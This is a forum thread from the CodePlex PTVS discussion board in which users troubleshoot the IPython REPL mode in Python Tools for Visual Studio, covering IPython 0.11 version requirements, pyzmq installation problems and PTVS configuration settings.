what kind of type the different properties are. idMap) from the IReferenceMap. But that is maybe only me. Guess the "correct" way of solving own properties is to save the value as html/xhtml and let the the parser handle the remapping of the urls. And the strange part, is that I dont see any difference between this method and RemapPermanentLinkReferences(IDictionary
https://world.episerver.com/blogs/Anders-Hattestad/Dates/2010/9/Shame-on-you-Mr-EPiServer/
CC-MAIN-2019-30
refinedweb
1,301
53.31
On 10/03/2012 07:01 AM, Liviu Nicoara wrote: > On 10/02/12 10:41, Martin Sebor wrote: >> I haven't had time to look at this since my last email on >> Sunday. I also forgot about the string mutex. I don't think >> I'll have time to spend on this until later in the week. >> Unless the disassembly reveals the smoking gun, I think we >> might need to simplify the test to get to the bottom of the >> differences in our measurements. (I.e., eliminate the library >> and measure the runtime of a simple thread loop, with and >> without locking.) We should also look at the GLIBC and >> kernel versions on our systems, on the off chance that >> there has been a change that could explain the discrepancy >> between my numbers and yours. I suspect my system (RHEL 4.8) >> is much older than yours (I don't remember now if you posted >> your details). > >). For the Linux tests I used a 16 CPU (Xeon X5570 @ 3GHz) box with RHEL 4.8 with 2.6.9-89.0.11.ELlargesmp, GLIBC version is 2.3.4, and GCC 3.4.6. Martin > > Liviu > >> >> Martin >> >> On 10/02/2012 06:22 AM, Liviu Nicoara wrote: >>> On 09/30/12 18:18, Martin Sebor wrote: >>>> I see you did a 64-bit build while I did a 32-bit one. so >>>> I tried 64-bits. The cached version (i.e., the one compiled >>>> with -UNO_USE_NUMPUNCT_CACHE) is still about twice as fast >>>> as the non-cached one (compiled with -DNO_USE_NUMPUNCT_CACHE). >>>> >>>> I had made one change to the test program that I thought might >>>> account for the difference: I removed the call to abort from >>>> the thread function since it was causing the process to exit >>>> prematurely in some of my tests. But since you used the >>>> modified program for your latest measurements that couldn't >>>> be it. >>>> >>>> I can't explain the differences. They just don't make sense >>>> to me. Your results should be the other way around. Can you >>>> post the disassembly of function f() for each of the two >>>> configurations of the test? >>> >>> The first thing that struck me in the cached `f' was that __string_ref >>> class uses a mutex for synchronizing access to the ref counter. It turns >>> out, for Linux on AMD64 we explicitly use a mutex instead of the atomic >>> ops on the ref counter, via a block in rw/_config.h: >>> >>> # if _RWSTD_VER_MAJOR < 5 >>> # ifdef _RWSTD_OS_LINUX >>> // on Linux/AMD64, unless explicitly requested, disable the use >>> // of atomic operations in string for binary compatibility with >>> // stdcxx 4.1.x >>> # ifndef _RWSTD_USE_STRING_ATOMIC_OPS >>> # define _RWSTD_NO_STRING_ATOMIC_OPS >>> # endif // _RWSTD_USE_STRING_ATOMIC_OPS >>> # endif // _WIN32 >>> # endif // stdcxx < 5.0 >>> >>> >>> That is not the cause for the performance difference, though. Even after >>> building with __RWSTD_USE_STRING_ATOMIC_OPS I get the same better >>> performance with the non-cached version. >>> >>> Liviu >
http://mail-archives.apache.org/mod_mbox/incubator-stdcxx-dev/201210.mbox/%3C506C5582.9080302@gmail.com%3E
CC-MAIN-2014-23
refinedweb
474
72.76
*PA3eP02fhccWGFcv Original Source Here Understand the Workings of Black-Box models with LIME While the performance of a machine learning model can seem impressive, it might not be making a significant impact to the business unless it is able to explain why it has given those predictions in the first place. A lot of work has been done with the hyperparameter tuning of various machine learning models in order to finally get the output of interest for the end-business users so that they can take actions according to the model. While your company understands the power of machine learning and determines the right persons and tools for their implementation, there might always be a requirement from the business about why a particular model has produced a result in the first place. If the models are able to generate the predictions well on the test data (unseen data) without interpretability, they make the users lay less trust overall. Hence, it can sometimes be crucial to add this additional dimension of machine learning called interpretability and understand its power in great detail. Now we have learned the importance of interpretability of the models for prediction, it is now time to explore ways at which we can actually make a black-box model more interpretable. When entering the field as vast as data science, one can see a wide array of ML models that could be used for various use cases. It is to be noted that no single model can always win in all the use cases, and it can highly also dependent on the data and the relationship between the input and the target feature respectively. Therefore, we should be open to finding out the results for a list of all the models and finally determine the best one after performing hyperparameter tuning on the test data. When exploring a list of models, we are often left with a large number of them that choosing the best one could be difficult. But the idea would be to start with the simplest model (linear model) or naive model before using more complex ones. Good thing about linear models is that they are highly interpretable (works well for our case) and can give business a good value when they are used in production. The catch, however, is that these linear models might not capture non-linear relationship between various features and the output. In this case, we are going to be using complex models that are powerful enough to understand these relationships and provide excellent prediction accuracy for classification. But the thing about complex models is that we would have to be sacrificing on interpretability. This is where we would be exploring a key area in machine learning called LIME (Local Interpretable Model-Agnostic Explanations). With the use of this library, we should be able to understand why the model has given a particular decision on the new test sample. With the power of the most complex model predictions along with LIME, we should be able to leverage these models when making predictions in real-time with interpretability. Let us now get started with the code about how we could use interpretability from LIME. Note that there are other approaches such as SHAP that could also be used for interpretability, but we would just stick with LIME for easier understanding. It is also important to note that lime is model agnostic which means regardless of the model that is used in machine learning predictions, it can be used to provide interpretability. It means that we are good to also use deep learning models and expect our LIME to do the interpretation for us. Okay now that we have learned about LIME and its usefulness, it is now time to go ahead with the coding implementation of it. Code Implementation of LIME We are now going to be taking a look at the code implementation of LIME and how it can address the issue of interpretability of the models. It is to be noted that there are certain machine learning models from scikit-learn such as Random Forests or Decision Trees that have their default feature interpretability. However, there can be a large portion of ML and deep learning models that are not highly interpretable. In this case, it would be a good solution to go ahead with using LIME for interpretation. It is now time to install the library for LIME before we use it. If you are using the anaconda prompt with a default environment, then it can be quite easy to install LIME. You would have to open the anaconda prompt and then type the following as shown in the code cell below. conda install -c conda-forge lime If you want to use ‘pip’ to install LIME, feel free to do so. You might add this code directly in your Jupyter notebook to install LIME. pip install lime-python Importing the Libraries Now that the lime package or library is installed, the next step to be taken is to import it in the current Jupyter notebook before we get to use it in our application. import lime # Library that is used for LIME from sklearn.model_selection import train_test_split # Divides data from sklearn.preprocessing import StandardScaler # Performs scaling from sklearn.linear_model import LinearRegression from sklearn.svm import SVR Therefore, we would be using this library for our interpretability of various machine learning models. Apart from just the LIME library, we have also imported a list of additional libraries from scikit-learn. Let us explain the functions of each of those packages mentioned above in the coding cell. We use ‘train_test_split’ to basically divide our data into the training and the test parts. We use ‘StandardScaler’ to convert our features such that they should have zero mean and a unit standard deviation. This can be handy, especially if we are using distance-based machine learning models such as KNN (K Nearest Neighbors) and a few others. ‘LinearRegression’ is one of the most popular machine learning models used when the output various is continuous. Similarly, we also use additional model called Support Vector Regressor which in our case is ‘SVR’ respectively. Reading the Data After importing all the libraries, let us also take a look at the datasets. For the sake of simplicity, we are going to be reading the Boston housing data that is provided directly from the scikit-learn library. We might also import real-world datasets that are highly complex and expect our LIME library to do the job of interpretability. In our case, we can just use the Boston housing data to demonstrate the power of LIME for explaining the results of various models. In the code cell, we are going to import the datasets that are readily available in our scikit-learn library. from sklearn.datasets import load_bostonboston_housing = load_boston() X = boston_housing.data y = boston_housing.target Feature Engineering Since we are running feature importance on a dataset that is not very complex as we usually find in the real-world, it can be good to just use standard scaler for performing feature engineering. Note that there are a lot more things involved when we consider more complex and real-world datasets where things can involve finding new features, removing missing values and outliers and many other steps. X_train, X_test, y_train, y_test = train_test_split(X, y, test_size = 0.3, random_state = 101)scaler = StandardScaler() scaler.fit(X_train) X_train_transformed = scaler.transform(X_train) X_test_transformed = scaler.transform(X_test) As can be seen, the input data is divided into the training and the test parts so that we can perform standardization as shown. Machine Learning Predictions Now that the feature engineering side of things is completed, the next step would be to use our models that we have imported in the earlier code blocks and test their performance. We initially start with the linear regression model and then move to support vector regressor for analysis. model = LinearRegression() # Using the Linear Regression Model model.fit(X_train_transformed, y_train) # Train the Model y_predictions = model.predict(X_test_transformed) # Test the Model We store the result of the model predictions in the variable ‘y_predictions’ that could be used to understand the performance of our model as we already have our output values in ‘target’ variable. model = SVR() model.fit(X_train_transformed, y_train) y_predictions = model.predict(X_test_transformed) Similarly, we also perform the analysis with using the support vector regressor model for predictions. Finally, we test the performance of the two models with using the error metrics such as either the mean absolute percentage error or the mean squared error depending on the context of the context of the business problem. Local Interpretable Model Agnostic Explanations (LIME) Now that we have completed the work of machine learning predictions, we would now be required to be checking why the model is giving a particular prediction for our most recent data. We do it by using LIME as discussed above. In the code cell below, lime is imported, and the results are shown the image. Let us take a look at the results and determine why our model has given a particular house price prediction. from lime import lime_tabularexplainer = lime_tabular.LimeTabularExplainer(X_train, mode = "regression", feature_names = boston_housing.feature_names)explanation = explainer.explain_instance(X_test[0], model.predict, num_features = len(boston_housing.feature_names))explanation.show_in_notebook() We import the ‘lime_tabular’ and use its attributes to get our task of model explanation. It is important to add the mode at which we are performing the ML task which in our case is regression. Furthermore, there should be feature names given from the data. If we have a new test sample, it would be given to the explainer with a list of all the features that are used by the model. Finally, the output is displayed with the feature importance of list of categories that we have given to models for prediction. It also gives the condition as to whether each feature has led to an increase or decrease in the output variable, leading to model interpretability. From the figure, our model has predicted the house price to be 40.11$ based on the feature values given by the test instance. It could be seen that having the feature ‘LSTAT’ to be lower than 7.51 caused an increase in our prediction of our house price of about 6.61$. Coming to a similar argument, having ‘CHAS’ value to be 0 caused our model to predict 3.77$ below what should have been predicted. Therefore, we get a good sense of the features and their conditions leading to model predictions. If you are interested to know more about interpretability and tools that could be used, I would also suggest going through the documentation of SHAP (Shapley values) that also helps explain the model predictions. But for now, we are all done with the post and quite understood how we could be using LIME for interpretability. If you like to get more updates about my latest articles and also have unlimited access to the medium articles for just 5 dollars per month, feel free to use the link below to add your support for my work. Thanks. Below are the ways where you could contact me or take a look at my work. GitHub: suhasmaddali (Suhas Maddali ) (github.com) LinkedIn: (1) Suhas Maddali, Northeastern University, Data Science | LinkedIn Medium: Suhas Maddali — Medium AI/ML Trending AI/ML Article Identified & Digested via Granola by Ramsey Elbasheer; a Machine-Driven RSS Bot
https://ramseyelbasheer.io/2022/08/04/understand-the-workings-of-black-box-models-with-lime-2/
CC-MAIN-2022-33
refinedweb
1,905
51.58
Add the support to match the pair (like happens with brackets) for the alternate PHP syntax with colons. if ($i == 0):| endif; Leaving the cursor at | would highlight the "endif;" part. Same for foreach: / endforeach, while: / endwhile, else:, elseif ():, and switch: / endswitch; +1 for this idea. IMHO the colon syntax for PHP is a LOT more readable. A } just isnt' as expressive as 'endforeach'. If not on the colon then it would be great if the words 'if' and 'endif' could be highlighted in the same way as html opening and closing tags are handled. reassigning to default owner +1 for this please. Colon syntax is far more readable than braces in templates, but not having the ability to jump between begin and end blocks in this format makes it less tempting to use. batch reassigning Committed into web-main today. Should be available in the next daily build. Integrated into 'main-golden', will be available in build *201105120000* on (upload may still be in progress) Changeset: User: Petr Pisl <ppisl@netbeans.org> Log: #164347 - Highlight pairs for colon alternate syntax (if, foreach, while) #183555 - Syntax highlighting if endif constructs #187188 - Something similar to "match brackets" for "alternative syntax for control structures"
https://netbeans.org/bugzilla/show_bug.cgi?id=164347
CC-MAIN-2016-36
refinedweb
202
71.65
#include <ldap.h> LDAP *ldap_open(host, port) char *host; int port; LDAP *ldap_init(host, port) char *host; int port;. One of these two LDAP structure (defined below), which should be passed to subsequent calls to ldap_bind(), ldap_search(), etc. Certain fields in the LDAP structure can be set to indicate size limit, time limit, and how aliases are handled during operations. See <ldap.h> for more details. typedef struct ldap { /* ... other stuff you should not mess with ... */ char ld_lberoptions; int ld_deref; #define LDAP_DEREF_NEVER 0 #define LDAP_DEREF_SEARCHING 1 #define LDAP_DEREF_FINDING 2 #define LDAP_DEREF_ALWAYS 3 int ld_timelimit; int ld_sizelimit; #define LDAP_NO_LIMIT 0 int ld_errno; char *ld_error; char *ld_matched; int ld_refhoplimit; unsigned long ld_options; #define LDAP_OPT_REFERRALS 0x00000002 /* set by default */ #define LDAP_OPT_RESTART 0x00000004 /* ... other stuff you should not mess with ... */ } LDAP; ldap_init() acts just like ldap_open(), but does not open a connection to the LDAP server. The actual connection open will occur when the first operation is attempted. At this time, ldap_init() is preferred. ldap_open() will be depreciated in a later release. The other supported option is LDAP_OPT_RESTART, which if set will cause the LDAP library to restart the select(2) system call when it is interrupted by the system (i.e., errno is set to EINTR). This option is not supported on the Macintosh and under MS-DOS. An option can be turned off by clearing the appropriate bit in the ld_options field.
http://man.linuxmanpages.com/man3/ldap_init.3.php
crawl-003
refinedweb
230
65.83
RoaringBitmap alternatives and similar libraries Based on the "Data Structures" category. Alternatively, view RoaringBitmap alternatives based on common mentions on social networks and blogs. HyperMinHash-javaUnion, intersection, and set cardinality in loglog space Do you think we are missing an alternative of RoaringBitmap or a related project? Popular Comparisons README RoaringBitmap Bits, roaring bitmaps can be hundreds of times faster and they often offer significantly better compression. They can even be faster than uncompressed bitmaps. Roaring bitmaps are found to work well in many important applications: Use Roaring for bitmap compression whenever possible. Do not use other bitmap compression methods (Wang et al., SIGMOD 2017) kudos for making something that makes my software run 5x faster (Charles Parker from BigML) This library is used by - Apache Spark, - Apache Hive, - Apache Tez, - Apache Kylin, - Apache CarbonData, - Netflix Atlas, - OpenSearchServer, - zenvisage, - Jive Miru, - Tablesaw, - Apache Hivemall, - Gaffer, - Apache Pinot and - Apache Druid. The YouTube SQL Engine, Google Procella, uses Roaring bitmaps for indexing. Apache Lucene uses Roaring bitmaps, though they have their own independent implementation. Derivatives of Lucene such as Solr and Elastic also use Roaring bitmaps. Other platforms such as Whoosh, Microsoft Visual Studio Team Services (VSTS) and Pilosa also use Roaring bitmaps with their own implementations. You find Roaring bitmaps in InfluxDB, Bleve, Cloud Torrent, and so forth. There is a serialized format specification for interoperability between implementations. We have interoperable C/C++, Java and Go implementations. (c) 2013-... the RoaringBitmap authors This code is licensed under Apache License, Version 2.0 (AL2.0).. However, a bitset, even a compressed one is not always applicable. For example, if you have 1000 random-looking integers, then a simple array might be the best representation. We refer to this case as the "sparse" scenario. When should you use compressed bitmaps? An uncompressed BitSet can use a lot of memory. For example, if you take a BitSet and set the bit at position 1,000,000 to true and you have just over 100kB. That. The sparse scenario is another use case where compressed bitmaps should not be used. Keep in mind that random-looking data is usually not compressible. E.g., if you have a small set of 32-bit random integers, it is not mathematically possible to use far less than 32 bits per integer, and attempts at compression can be counterproductive. (Byte-aligned Bitmap Code) is an obsolete format at this point: though it may provide good compression, it is likely much slower than more recent alternatives due to excessive branching. - WAH (Word Aligned Hybrid) is a patented variation on BBC that provides better performance. - Concise is a variation on the patented WAH. It some specific instances, it can compress much better than WAH (up to 2x better), but it is generally slower. - EWAH (Enhanced Word Aligned Hybrid) than run-length-encoded formats like WAH, EWAH, Concise... Maybe surprisingly, Roaring also generally offers better compression ratios. API docs Scientific Documentation - Daniel Lemire, Owen Kaser, Nathan Kurz, Luca Deri, Chris O'Hara, François Saint-Jacques, Gregory Ssi-Yan-Kai, Roaring Bitmaps: Implementation of an Optimized Software Library, Software: Practice and Experience 48 (4), 2018 arXiv:1709.07821 - Samy Chambi, Daniel Lemire, Owen Kaser, Robert Godin, Better bitmap performance with Roaring bitmaps, Software: Practice and Experience Volume 46, Issue 5, pages 709–719, May 2016 This paper used data from - Daniel Lemire, Gregory Ssi-Yan-Kai, Owen Kaser, Consistently faster and smaller compressed bitmaps with Roaring, Software: Practice and Experience 46 (11), 2016. - Samy Chambi, Daniel Lemire, Robert Godin, Kamel Boukhalfa, Charles Allen, Fangjin Yang, Optimizing Druid with Roaring bitmaps, IDEAS 2016, 2016. Code sample import org.roaringbitmap.RoaringBitmap; public class Basic { public static void main(String[] args) { RoaringBitmap rr = RoaringBitmap.bitmapOf(1,2,3,1000); RoaringBitmap rr2 = new RoaringBitmap(); rr2.add(4000L,4255L); rr.select(3); // would return the third value or 1000 rr.rank(2); // would return the rank of 2, which is index 1 rr.contains(1000); // will return true rr.contains(7); // will return false RoaringBitmap rror = RoaringBitmap.or(rr, rr2);// new bitmap rr.or(rr2); //in-place computation boolean equals = rror.equals(rr);// true if(!equals) throw new RuntimeException("bug"); // number of values stored? long cardinality = rr.getLongCardinality(); System.out.println(cardinality); // a "forEach" is faster than this loop, but a loop is possible: for(int i : rr) { System.out.println(i); } } } Please see the examples folder for more examples, which you can run with ./gradlew :examples:runAll, or run a specific one with ./gradlew :examples:runExampleBitmap64, etc. Unsigned integers Java lacks native unsigned integers but integers are still considered to be unsigned within Roaring and ordered according to Integer.compareUnsigned. This means that Java will order the numbers like so 0, 1, ..., 2147483647, -2147483648, -2147483647,..., -1. To interpret correctly, you can use Integer.toUnsignedLong and Integer.toUnsignedString. Working with memory-mapped bitmaps If you want to have your bitmaps lie in memory-mapped files, you can use the org.roaringbitmap.buffer package instead. It contains two important classes, ImmutableRoaringBitmap and MutableRoaringBitmap. MutableRoaringBitmaps are derived from ImmutableRoaringBitmap, so that you can convert (cast) a MutableRoaringBitmap to an ImmutableRoaringBitmap in constant time. An ImmutableRoaringBitmap that is not an instance of a MutableRoaringBitmap is backed by a ByteBuffer which comes with some performance overhead, but with the added flexibility that the data can reside anywhere (including outside of the Java heap). At times you may need to work with bitmaps that reside on disk (instances of ImmutableRoaringBitmap) and bitmaps that reside in Java memory. If you know that the bitmaps will reside in Java memory, it is best to use MutableRoaringBitmap instances, not only can they be modified, but they will also be faster. Moreover, because MutableRoaringBitmap instances are also ImmutableRoaringBitmap instances, you can write much of your code expecting ImmutableRoaringBitmap. If you write your code expecting ImmutableRoaringBitmap instances, without attempting to cast the instances, then your objects will be truly immutable. The MutableRoaringBitmap has a convenience method (toImmutableRoaringBitmap) which is a simple cast back to an ImmutableRoaringBitmap instance. From a language design point of view, instances of the ImmutableRoaringBitmap class are immutable only when used as per the interface of the ImmutableRoaringBitmap class. Given that the class is not final, it is possible to modify instances, through other interfaces. Thus we do not take the term "immutable" in a purist manner, but rather in a practical one. One of our motivations for this design where MutableRoaringBitmap instances can be casted down to ImmutableRoaringBitmap instances is that bitmaps are often large, or used in a context where memory allocations are to be avoided, so we avoid forcing copies. Copies could be expected if one needs to mix and match ImmutableRoaringBitmap and MutableRoaringBitmap instances. The following code sample illustrates how to create an ImmutableRoaringBitmap from a ByteBuffer. In such instances, the constructor only loads the meta-data in RAM while the actual data is accessed from the ByteBuffer on demand. import org.roaringbitmap.buffer.*; //... MutableRoaringBitmap rr1 = MutableRoaringBitmap.bitmapOf(1, 2, 3, 1000); MutableRoaringBitmap rr2 = MutableRoaringBitmap.bitmapOf( 2, 3, 1010); ByteArrayOutputStream bos = new ByteArrayOutputStream(); DataOutputStream dos = new DataOutputStream(bos); // If there were runs of consecutive values, you could // call rr1.runOptimize(); or rr2.runOptimize(); to improve compression rr1.serialize(dos); rr2.serialize(dos); dos.close(); ByteBuffer bb = ByteBuffer.wrap(bos.toByteArray()); ImmutableRoaringBitmap rrback1 = new ImmutableRoaringBitmap(bb); bb.position(bb.position() + rrback1.serializedSizeInBytes()); ImmutableRoaringBitmap rrback2 = new ImmutableRoaringBitmap(bb); Alternatively, we can serialize directly to a ByteBuffer with the serialize(ByteBuffer) method. Operations on an ImmutableRoaringBitmap such as and, or, xor, flip, will generate a RoaringBitmap which lies in RAM. As the name suggest, the ImmutableRoaringBitmap itself cannot be modified. This design was inspired by Druid. One can find a complete working example in the test file TestMemoryMapping.java. Note that you should not mix the classes from the org.roaringbitmap package with the classes from the org.roaringbitmap.buffer package. They are incompatible. They serialize to the same output however. The performance of the code in org.roaringbitmap package is generally superior because there is no overhead due to the use of ByteBuffer instances. Kryo Many applications use Kryo for serialization/deserialization. One can use Roaring bitmaps with Kryo efficiently thanks to a custom serializer (Kryo 5): public class RoaringSerializer extends Serializer<RoaringBitmap> { @Override public void write(Kryo kryo, Output output, RoaringBitmap bitmap) { try { bitmap.serialize(new KryoDataOutput(output)); } catch (IOException e) { e.printStackTrace(); throw new RuntimeException(); } } @Override public RoaringBitmap read(Kryo kryo, Input input, Class<? extends RoaringBitmap> type) { RoaringBitmap bitmap = new RoaringBitmap(); try { bitmap.deserialize(new KryoDataInput(input)); } catch (IOException e) { e.printStackTrace(); throw new RuntimeException(); } return bitmap; } } 64-bit integers (long) Though Roaring Bitmaps were designed with the 32-bit case in mind, we have extensions to 64-bit integers. We offer two classes for this purpose: Roaring64NavigableMap and Roaring64Bitmap. The Roaring64NavigableMap relies on a conventional red-black-tree. The keys are 32-bit integers representing the most significant 32~bits of elements whereas the values of the tree are 32-bit Roaring bitmaps. The 32-bit Roaring bitmaps represent the least significant bits of a set of elements. The newer Roaring64Bitmap approach relies on the ART data structure to hold the key/value pair. The key is made of the most significant 48~bits of elements whereas the values are 16-bit Roaring containers. It is inspired by The Adaptive Radix Tree: ARTful Indexing for Main-Memory Databases by Leis et al. (ICDE '13). import org.roaringbitmap.longlong.*; // first Roaring64NavigableMap LongBitmapDataProvider r = Roaring64NavigableMap.bitmapOf(1,2,100,1000); r.addLong(1234); System.out.println(r.contains(1)); // true System.out.println(r.contains(3)); // false LongIterator i = r.getLongIterator(); while(i.hasNext()) System.out.println(i.next()); // second Roaring64Bitmap bitmap1 = new Roaring64Bitmap(); bitmap2 = new Roaring64Bitmap(); int k = 1 << 16; long i = Long.MAX_VALUE / 2; long base = i; for (; i < base + 10000; ++i) { bitmap1.add(i * k); bitmap2.add(i * k); } b1.and(bitmap2); Range Bitmaps RangeBitmap is a succinct data structure supporting range queries. Each value added to the bitmap is associated with an incremental identifier, and queries produce a RoaringBitmap of the identifiers associated with values that satisfy the query. Every value added to the bitmap is stored separately, so that if a value is added twice, it will be stored twice, and if that value is less than some threshold, there will be at least two integers in the resultant RoaringBitmap. It is more efficient - in terms of both time and space - to provide a maximum value. If you don't know the maximum value, provide a Long.MAX_VALUE. Unsigned order is used like elsewhere in the library. var appender = RangeBitmap.appender(1_000_000); appender.add(1L); appender.add(1L); appender.add(100_000L); RangeBitmap bitmap = appender.build(); RoaringBitmap lessThan5 = bitmap.lt(5); // {0,1} RoaringBitmap greaterThanOrEqualTo1 = bitmap.gte(1); // {0, 1, 2} RoaringBitmap greaterThan1 = bitmap.gt(1); // {2} RangeBitmap is can be written to disk and memory mapped: var appender = RangeBitmap.appender(1_000_000); appender.add(1L); appender.add(1L); appender.add(100_000L); ByteBuffer buffer = mapBuffer(appender.serializedSizeInBytes()); appender.serialize(buffer); RangeBitmap bitmap = RangeBitmap.map(buffer); The serialization format uses little endian byte order. Prerequisites - Version 0.7.x requires JDK 8 or better - Version 0.6.x requires JDK 7 or better - Version 0.5.x requires JDK 6 or better To build the project you need maven (version 3). Download You can download releases from github: Maven repository If your project depends on roaring, you can specify the dependency in the Maven "pom.xml" file: <dependencies> <dependency> <groupId>org.roaringbitmap</groupId> <artifactId>RoaringBitmap</artifactId> <version>0.9.9</version> </dependency> </dependencies> where you should replace the version number by the version you require. For up-to-date releases, we recommend configuring maven and gradle to depend on the Jitpack repository. Usage Get java ./gradlew assemblewill compile ./gradlew buildwill compile and run the unit tests ./gradlew testwill run the tests ./gradlew :roaringbitmap:test --tests TestIterators.testIndexIterator4run just the test TestIterators.testIndexIterator4 ./gradlew checkstyleMainwill check that you abide by the code style and that the code compiles. We enforce a strict style so that there is no debate as to the proper way to format the code. IntelliJ and Eclipse If you plan to contribute to RoaringBitmap, you can have load it up in your favorite IDE. - For IntelliJ, in the IDE create a new project, possibly from existing sources, choose import, gradle. - For Eclipse: File, Import, Existing Gradle Projects, Select RoaringBitmap on my disk Contributing Contributions are invited. We enforce the Google Java style. Please run ./gradlew checkstyleMain on your code before submitting a patch. - I am getting an error about a bad cookie. What is this about? In the serialized files, part of the first 4 bytes are dedicated to a "cookie" which serves to indicate the file format. If you try to deserialize or map a bitmap from data that has an unrecognized "cookie", the code will abort the process and report an error. This problem will occur to all users who serialized Roaring bitmaps using versions prior to 0.4.x as they upgrade to version 0.4.x or better. These users need to refresh their serialized bitmaps. - How big can a Roaring bitmap get? Given N integers in [0,x), then the serialized size in bytes of a Roaring bitmap should never exceed this bound: 8 + 9 * ((long)x+65535)/65536 + 2 * N That is, given a fixed overhead for the universe size (x), Roaring bitmaps never use more than 2 bytes per integer. You can call RoaringBitmap.maximumSerializedSize for a more precise estimate. - What is the worst case scenario for Roaring bitmaps? There is no such thing as a data structure that is always ideal. You should make sure that Roaring bitmaps fit your application profile. There are at least two cases where Roaring bitmaps can be easily replaced by superior alternatives compression-wise: You have few random values spanning in a large interval (i.e., you have a very sparse set). For example, take the set 0, 65536, 131072, 196608, 262144 ... If this is typical of your application, you might consider using a HashSet or a simple sorted array. You have dense set of random values that never form runs of continuous values. For example, consider the set 0,2,4,...,10000. If this is typical of your application, you might be better served with a conventional bitset (e.g., Java's BitSet class). How do I select an element at random? Random random = new Random(); bitmap.select(random.nextInt(bitmap.getCardinality())); Benchmark To run JMH benchmarks, use the following command: $ ./gradlew jmhJar You can also run specific benchmarks... $ ./jmh/run.sh 'org.roaringbitmap.aggregation.and.identical.*' Mailing list/discussion group Funding This work was supported by NSERC grant number 26143. *Note that all licence references and agreements mentioned in the RoaringBitmap README section above are relevant to that project's source code only.
https://java.libhunt.com/roaringbitmap-alternatives
CC-MAIN-2022-05
refinedweb
2,473
50.23
CodePlexProject Hosting for Open Source Software I tried setting the interactive mode to IPython, but I get the following error when running a program via Execute in PI: Error using selected REPL back-end: IPython mode requires IPython 0.11 or later. Using standard backend instead AFAIK the latest stable version of IPython is 0.10.2. What am I missing? Do we have to use dev branch? Thanks! Yes, you have to use the dev branch. Ah, thats unfortunate as .11 breaks PythonXY's shell extension. I configured a separate CPython 2.6 installation (using virtualenv) and installed the latest version of IPython, but I am still having issues getting PTVS to work with it. After configuring a new python interpreter in VS and copying the settings from the default (except the location of course), I tried running this script: import IPython print "IPython version is " + IPython.__version__ The result in interactive is: Running C:\Users\kyon\documents\visual studio 2010\Projects\IPythonEmbedTest\IPythonEmbedTest\Program.py Error using selected REPL back-end: IPython mode requires IPython 0.11 or later. Using standard backend instead IPython version is 0.11.dev It seems the python interpreter being invoked is using IPython 0.11.dev but PTVS is still not accepting it. Any ideas? As an aside, I was able to generate exceptions and even crash VS by adding/removing interpreters in Tools->Options->Python Tools-> Interactive <...>. In particular: - If I add and then delete an interpreter in interpreter options, it will still shows up in interactive windows until VS is restarted. Selecting it gives a KeyNotFoundException, full stack trace below. - If i type "2.6" (no quotes) into the language version box I get a warning box saying "version is not in invalid format and will not be updated", but 2.6 is what is entered in for the default interpreter. - If I add a new interpreter in options, cannot set its interactive mode unless Options window is reopened. Doing so still causes the exception shown below, until VS is restarted. - Adding and deleting interpreters caused VS to crash at one point, wasn't able to reproduce it. System.Collections.Generic.KeyNotFoundException: The given key was not present in the dictionary. at System.Collections.Generic.Dictionary`2.get_Item(TKey key) at Microsoft.PythonTools.Options.PythonInteractiveOptionsControl.get_CurrentOptions() at Microsoft.PythonTools.Options.PythonInteractiveOptionsControl.RefreshOptions() at Microsoft.PythonTools.Options.PythonInteractiveOptionsControl._showSettingsFor installed the IPython 0.11 release version and configured interactive mode to "IPython" and am getting the same error as kyon: Am I doing something wrong? I can import IPython and assert its version from that very same interactive window: >>> import IPython >>> IPython.__version__ '0.11' This is usually caused by not having ZeroMQ installed (IPython uses zmq for it's communication, but it's not required for just the basic IPython experience - only if someone is hosting IPython). If you have easy_install you can just do an easy_install.exe pyzmq and it should work. If that's not the issue I can tell you how to make it print the exception which is preventing IPython from loading - we should probably do that by default instead of hiding it. I'm trying to install pyzmq but it complains that it cannot find the ZMQ directory. Do I need to first build and install ZMQ before I easy_install pyzmq? Here is the output I get:- >easy_install pyzmq Searching for pyzmq Reading Reading Reading Best match: pyzmq 2.1.9 Downloading Processing pyzmq-2.1.9.zip Running pyzmq-2.1.9\setup.py -q bdist_egg --dist-dir c:\users\dfortu~1\appdata\local\temp\easy_install-x0rm3f\pyzmq-2.1.9\egg-dist-tmp-9i91gp Fatal: ZMQ directory must be specified on Windows via setup.cfg or 'python setup.py configure --zmq=/path/to/zeromq2' error: Setup script exited with 1 I'm not sure why that wouldn't work (maybe a bug in the setup script for zeromq?) I'd suggest trying the binary installers instead: Yeah, I held off on that because the latest version didn't have a binary distribution for python 2.6 but I've now installed a slightly older 'pyzmq-2.1.4.win32-py2.6.msi' and it all works fine. Thanks! Hi, I've just started using PTVS with IPython 0.11 and I'm getting the same error: I've installed pyzmq but that hasn't sorted it. Any other suggestions? Thanks. darwinian, Can you open a Python REPL and run: from IPython.zmq.kernelmanager import ShellSocketChannel, KernelManager, SubSocketChannel, StdInSocketChannel, HBSocketChannel And see what exceptions you get? Hi dinov, thanks for the reply. I ran the imports and... no errors at all. Could it have accidently been in different REPLs - in other words did you try it from the VS repl or a normal CMD repl? It might be best to try it from the VS repl after you get the error just to make sure everything else is the same. Apologies, I hadn't realised you meant from the VS IPython REPL. Unfortunately I now have a different issue preventing me from trying: VS no longer detects IPython as an available REPL. I've tried reinstalling PTVS and still nothing, despite IPython being installed and working. Is there a way to force PTVS to detect it? What do you mean "as an available REPL"? Do you mean you no longer have "View->Other Windows->Python ..." or that Tools->Options->Interactive Windows->Interactive Mode no longer lists IPython as an available mode? If it's the former what versions of Python do you have installed and where did the distro come from (e.g. python.org, Enthought, ActiveState, etc...)? I mean IPython no longer appears under Tools->Options->Interactive Windows->Interactive Mode. The only option available is the standard Python 2.7 interactive window. I have the Enthought 7.1 free distribution installed. One possible solution is to paste visualstudio_ipython_repl.IPythonBackend into the text box (which is what IPython magically turns into). I'm not really sure what would cause this to go away, this should be registered in our .pkgdef file (in %LOCALAPPDATA%\Microsoft\VisualStudio\10.0\Extensions\Microsoft\Python Tools for Visual Studio\1.0\Microsoft.PythonTools.pkgdef if you did a per-user install, or in VsInstallDir\Common7\IDE\Extensions\Microsoft\Python Tools for Visual Studio\1.0\Microsoft.PythonTools.pkgdef for the default all users install). This actually should always be there regardless of whether or not IPython is installed. Does that file still have: [$RootKey$\PythonTools\ReplExecutionModes\{91BB0245-B2A9-47BF-8D76-DD428C6D8974}] "Type"="visualstudio_ipython_repl.IPythonBackend" "FriendlyName"="IPython" "SupportsMultipleScopes"="False" In it? I just encountered the same issue, and I found the following was the issue: in the \<python>\Lib\site-packages\IPython\zmq\__init__.py file ' 